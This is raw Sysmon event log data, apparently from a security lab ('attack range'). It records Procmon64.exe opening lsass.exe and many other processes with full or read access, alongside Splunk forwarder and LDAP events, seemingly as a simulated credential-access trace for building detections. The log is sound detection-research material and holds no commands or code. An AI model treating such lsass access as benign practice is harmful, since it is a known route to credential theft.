Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288867Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:03.425{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-11AE-6216-1B05-000000003802}5612C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288866Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:03.295{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-11AE-6216-1B05-000000003802}5612C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288865Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:03.281{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-11AD-6216-1905-000000003802}4760C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288864Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:03.146{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-11AD-6216-1905-000000003802}4760C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288863Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:03.146{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-11AD-6216-1805-000000003802}5296C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288862Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:03.061{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-11AD-6216-1805-000000003802}5296C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288861Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:03.061{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-11AC-6216-1705-000000003802}5396C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000216895Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:04.611{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DC6D9D3BE57FF9B39C164219881A106,SHA256=09C9A08007CDBE4F6851B59FFCDDECFF7C4C3DF47A9726EFE3D3D3DA87D149D7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000288888Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:04.695{C8EA50B7-11CB-6216-2005-000000003802}2328224C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288887Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:04.695{C8EA50B7-11CB-6216-2005-000000003802}2328224C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000288886Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:04.595{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB9CD139CF68A895ACCE2B1023122B6D,SHA256=2DF6F11E832BCF12FFF5BA230A95B1CD532E85E2DA21AAFF7621093F1285C0DF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000288885Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:04.580{C8EA50B7-11CB-6216-2005-000000003802}2328224C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288884Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:04.580{C8EA50B7-11CB-6216-2005-000000003802}2328224C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288883Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:04.197{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-11D4-6216-2505-000000003802}6380C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288882Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:04.181{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288881Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:04.181{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288880Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:04.181{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288879Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:04.181{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288878Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:04.181{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-11D4-6216-2505-000000003802}6380C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000288877Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:04.181{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-11D4-6216-2505-000000003802}6380C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000288876Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:04.184{C8EA50B7-11D4-6216-2505-000000003802}6380C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000288875Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:04.013{C8EA50B7-11CB-6216-2005-000000003802}2328224C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000216896Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:05.846{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F037E6FA1C20C4D906D9C5CFB561FC5D,SHA256=B71C882BCFFFB2315236BD59203307733222AD9B3D9D533F2D0B07D974891320,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288900Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:05.649{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBE590E863E2713A9F66831F63CFCFF1,SHA256=A46F31077A75713DE162C2C7A8E77098B6A9BDA0E512138341DAD54EC51C6C85,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000288899Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:05.527{C8EA50B7-11CB-6216-2005-000000003802}2328224C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-0C00-000000003802}828C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288898Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:05.449{C8EA50B7-11CB-6216-2005-000000003802}2328224C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-0C00-000000003802}828C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288897Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:05.449{C8EA50B7-11CB-6216-2005-000000003802}2328224C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288896Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:05.395{C8EA50B7-11CB-6216-2005-000000003802}2328224C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288895Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:05.395{C8EA50B7-11CB-6216-2005-000000003802}2328224C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000288894Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:03.190{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53493-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000288893Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:03.190{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53493-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 10341000x8000000000000000288892Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 